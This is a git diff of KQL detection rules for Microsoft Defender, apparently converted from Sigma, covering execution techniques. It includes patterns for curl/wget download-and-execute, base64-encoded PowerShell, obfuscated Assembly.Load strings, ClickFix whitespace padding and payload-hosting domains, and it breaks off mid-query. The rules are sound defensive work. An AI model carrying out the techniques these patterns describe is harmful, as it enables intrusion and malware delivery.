-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
-// False Positives:
-// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
-
-DeviceProcessEvents
+// Title: SQL Client Tools PowerShell Session Detection
+// Author: Agro (@agro_sev) oscd.communitly
+// Date: 2020-10-13
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/Execution/start_windows_service_via_net_exe.kql
index cd8eafac..497aca43 100644
--- a/KQL/rules/Execution/start_windows_service_via_net_exe.kql
+++ b/KQL/rules/Execution/start_windows_service_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Start Windows Service Via Net.EXE
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-21
-// Level: low
-// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002
-// False Positives:
-// - Legitimate administrator or user executes a service for legitimate reasons.
-
-DeviceProcessEvents
+// Title: Start Windows Service Via Net.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+// False Positives:
+// - Legitimate administrator or user executes a service for legitimate reasons.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/Execution/successful_account_login_via_wmi.kql
index e1d4a6ee..e2c25695 100644
--- a/KQL/rules/Execution/successful_account_login_via_wmi.kql
+++ b/KQL/rules/Execution/successful_account_login_via_wmi.kql
@@ -1,13 +1,13 @@
-// Title: Successful Account Login Via WMI
-// Author: Thomas Patzke
-// Date: 2019-12-04
-// Level: low
-// Description: Detects successful logon attempts performed with WMI
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-// False Positives:
-// - Monitoring tools
-// - Legitimate system administration
-
-DeviceLogonEvents
+// Title: Successful Account Login Via WMI
+// Author: Thomas Patzke
+// Date: 2019-12-04
+// Level: low
+// Description: Detects successful logon attempts performed with WMI
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - Monitoring tools
+// - Legitimate system administration
+
+DeviceLogonEvents
 | where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
index dea171ba..b896cc0c 100644
--- a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
+++ b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Binaries and Scripts in Public Folder
-// Author: The DFIR Report
-// Date: 2025-01-23
-// Level: high
-// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204
-// False Positives:
-// - Administrators deploying legitimate binaries to public folders.
-
-DeviceFileEvents
+// Title: Suspicious Binaries and Scripts in Public Folder
+// Author: The DFIR Report
+// Date: 2025-01-23
+// Level: high
+// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204
+// False Positives:
+// - Administrators deploying legitimate binaries to public folders.
+
+DeviceFileEvents
 | where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql
index 453e0bf3..15ef6478 100644
--- a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql
+++ b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Binary In User Directory Spawned From Office Application
-// Author: Jason Lynch
-// Date: 2019-04-02
-// Level: high
-// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
-
-DeviceProcessEvents
+// Title: Suspicious Binary In User Directory Spawned From Office Application
+// Author: Jason Lynch
+// Date: 2019-04-02
+// Level: high
+// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
+
+DeviceProcessEvents
 | where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql
index 8a34bb30..1e46d243 100644
--- a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql
+++ b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Child Process Of BgInfo.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: high
+// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
index 8827aa3e..a68ba8a4 100644
--- a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
+++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Deno File Written from Remote Source
-// Author: Josh Nickels, Michael Taggart
-// Date: 2025-05-22
-// Level: low
-// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
-// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate usage of deno to request a file or bring a DLL to a host
-
-DeviceFileEvents
+// Title: Suspicious Deno File Written from Remote Source
+// Author: Josh Nickels, Michael Taggart
+// Date: 2025-05-22
+// Level: low
+// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
+// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate usage of deno to request a file or bring a DLL to a host
+
+DeviceFileEvents
 | where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
index 764a41bf..67d2a5c2 100644
--- a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
+++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
@@ -1,16 +1,16 @@
-// Title: Suspicious Download and Execute Pattern via Curl/Wget
-// Author: Aayush Gupta
-// Date: 2025-06-17
-// Level: high
-// Description: Detects suspicious use of command-line tools such as curl or wget to download remote
-// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
-// immediate execution, indicating potential malicious activity. This pattern is commonly used
-// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.004, attack.t1203
-// False Positives:
-// - System update scripts using temporary files
-// - Installer scripts or automated provisioning tools
-
-DeviceProcessEvents
+// Title: Suspicious Download and Execute Pattern via Curl/Wget
+// Author: Aayush Gupta
+// Date: 2025-06-17
+// Level: high
+// Description: Detects suspicious use of command-line tools such as curl or wget to download remote
+// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
+// immediate execution, indicating potential malicious activity. This pattern is commonly used
+// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.t1203
+// False Positives:
+// - System update scripts using temporary files
+// - Installer scripts or automated provisioning tools
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
index bacdf833..212f96f2 100644
--- a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
+++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Electron Application Child Processes
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-21
-// Level: medium
-// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious Electron Application Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or 
FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
index f2ef91d2..557b32bc 100644
--- a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
+++ b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
-// Author: pH-T (Nextron Systems)
-// Date: 2022-03-01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
+// Author: pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
+// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or 
ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql
index 46581024..b4c94242 100644
--- a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql
+++ b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Encoded PowerShell Command Line
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
-// Date: 2018-09-03
-// Level: high
-// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Suspicious Encoded PowerShell Command Line
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
+// Date: 2018-09-03
+// Level: high
+// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
index 1fe5f0c2..f0985def 100644
--- a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
+++ b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution Location Of Wermgr.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-10-14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious Execution Location Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
index e1d5ccdf..fbe91752 100644
--- a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
+++ b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of Powershell with Base64
-// Author: frack113
-// Date: 2022-01-02
-// Level: medium
-// Description: Commandline to launch powershell with a base64 payload
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Suspicious Execution of Powershell with Base64
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Commandline to launch powershell with a base64 payload
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
index 012aac26..58552aa1 100644
--- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
+++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-11-04
-// Level: high
-// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
-// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
-// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
-
-DeviceProcessEvents
+// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
+// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
+// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
+// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents | where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql index 498abae2..882207d0 100644 --- a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql +++ b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql 
@@ -1,10 +1,10 @@
-// Title: Suspicious File Characteristics Due to Missing Fields
-// Author: Markus Neis, Sander Wiebing
-// Date: 2018-11-22
-// Level: medium
-// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.006
-
-DeviceProcessEvents
+// Title: Suspicious File Characteristics Due to Missing Fields
+// Author: Markus Neis, Sander Wiebing
+// Date: 2018-11-22
+// Level: medium
+// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006
+
+DeviceProcessEvents
 | where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
index c8d27aee..41026715 100644
--- a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
+++ b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious File Created In PerfLogs
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-05
-// Level: medium
-// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Suspicious File Created In PerfLogs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
index 61e252ec..78285879 100644
--- a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
+++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-05
-// Level: high
-// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains 